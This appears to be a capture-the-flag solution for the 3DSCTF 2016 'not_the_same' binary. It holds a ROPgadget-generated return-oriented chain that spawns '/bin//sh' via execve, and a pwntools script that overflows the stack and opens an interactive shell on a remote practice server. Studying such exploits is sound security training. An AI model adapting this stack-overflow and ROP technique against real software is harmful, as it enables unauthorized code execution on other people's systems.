ROPgadget --binary not_the_same_3dsctf_2016 --ropchain
自动生成
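from struct import pack

# ROP chain emitted by `ROPgadget --binary not_the_same_3dsctf_2016 --ropchain`.
# Gadget and .data addresses are absolute values taken from that one binary;
# the chain is meaningless against any other build.
#
# Ported from ROPgadget's Python 2 output: struct.pack() returns bytes on
# Python 3, so the accumulator and the string constants must be bytes too
# (the original `p = ''` / `'/bin'` raise TypeError on the first `+=`).
p = b''

# Write "/bin" to .data
p += pack('<I', 0x0806fcca) # pop edx ; ret
p += pack('<I', 0x080eb060) # @ .data
p += pack('<I', 0x08048b0b) # pop eax ; ret
p += b'/bin'
p += pack('<I', 0x0805586b) # mov dword ptr [edx], eax ; ret

# Write "//sh" to .data + 4 -> "/bin//sh"
p += pack('<I', 0x0806fcca) # pop edx ; ret
p += pack('<I', 0x080eb064) # @ .data + 4
p += pack('<I', 0x08048b0b) # pop eax ; ret
p += b'//sh'
p += pack('<I', 0x0805586b) # mov dword ptr [edx], eax ; ret

# Write a zero dword to .data + 8 (NUL terminator / empty pointer slot)
p += pack('<I', 0x0806fcca) # pop edx ; ret
p += pack('<I', 0x080eb068) # @ .data + 8
p += pack('<I', 0x08049423) # xor eax, eax ; ret
p += pack('<I', 0x0805586b) # mov dword ptr [edx], eax ; ret

# ebx = .data (string), ecx = edx = .data + 8 (the zero dword)
p += pack('<I', 0x080481ad) # pop ebx ; ret
p += pack('<I', 0x080eb060) # @ .data
p += pack('<I', 0x0806fcf1) # pop ecx ; pop ebx ; ret
p += pack('<I', 0x080eb068) # @ .data + 8
p += pack('<I', 0x080eb060) # padding without overwrite ebx
p += pack('<I', 0x0806fcca) # pop edx ; ret
p += pack('<I', 0x080eb068) # @ .data + 8

# eax = 11 (execve on i386 Linux), built from xor + eleven `inc eax` gadgets
# rather than popping the constant; pack('<I', 11) would contain NUL bytes,
# which is presumably why ROPgadget avoids it.
p += pack('<I', 0x08049423) # xor eax, eax ; ret
p += pack('<I', 0x0807b2af) * 11 # inc eax ; ret  (x11)
p += pack('<I', 0x0806d8a5) # int 0x80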
加上自己算的偏移
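from pwn import *
# Re-import struct.pack AFTER `from pwn import *`: pwntools exports its own
# `pack(number, ...)` with a different signature, and the ROPgadget chain
# below uses the struct form pack('<I', addr).
from struct import pack

elf = ELF("./not_the_same_3dsctf_2016")
#sh = process("./not_the_same_3dsctf_2016")
sh = remote("node3.buuoj.cn",26066)
context.log_level = "debug"
context.arch = "i386"

# Payload = 0x2D bytes of filler (the hand-computed offset to the saved
# return address) followed by the ROPgadget chain. Everything is bytes so
# the script runs on Python 3: cyclic() and struct.pack() both return bytes,
# and the original str literals ('', '/bin', '//sh') raise TypeError there.
p = cyclic(0x2D)

# Write "/bin" to .data
p += pack('<I', 0x0806fcca) # pop edx ; ret
p += pack('<I', 0x080eb060) # @ .data
p += pack('<I', 0x08048b0b) # pop eax ; ret
p += b'/bin'
p += pack('<I', 0x0805586b) # mov dword ptr [edx], eax ; ret

# Write "//sh" to .data + 4 -> "/bin//sh"
p += pack('<I', 0x0806fcca) # pop edx ; ret
p += pack('<I', 0x080eb064) # @ .data + 4
p += pack('<I', 0x08048b0b) # pop eax ; ret
p += b'//sh'
p += pack('<I', 0x0805586b) # mov dword ptr [edx], eax ; ret

# Write a zero dword to .data + 8 (NUL terminator / empty pointer slot)
p += pack('<I', 0x0806fcca) # pop edx ; ret
p += pack('<I', 0x080eb068) # @ .data + 8
p += pack('<I', 0x08049423) # xor eax, eax ; ret
p += pack('<I', 0x0805586b) # mov dword ptr [edx], eax ; ret

# ebx = .data (string), ecx = edx = .data + 8 (the zero dword)
p += pack('<I', 0x080481ad) # pop ebx ; ret
p += pack('<I', 0x080eb060) # @ .data
p += pack('<I', 0x0806fcf1) # pop ecx ; pop ebx ; ret
p += pack('<I', 0x080eb068) # @ .data + 8
p += pack('<I', 0x080eb060) # padding without overwrite ebx
p += pack('<I', 0x0806fcca) # pop edx ; ret
p += pack('<I', 0x080eb068) # @ .data + 8

# eax = 11 (execve on i386 Linux) via xor + eleven `inc eax` gadgets
p += pack('<I', 0x08049423) # xor eax, eax ; ret
p += pack('<I', 0x0807b2af) * 11 # inc eax ; ret  (x11)
p += pack('<I', 0x0806d8a5) # int 0x80

sh.sendline(p)
sh.interactive()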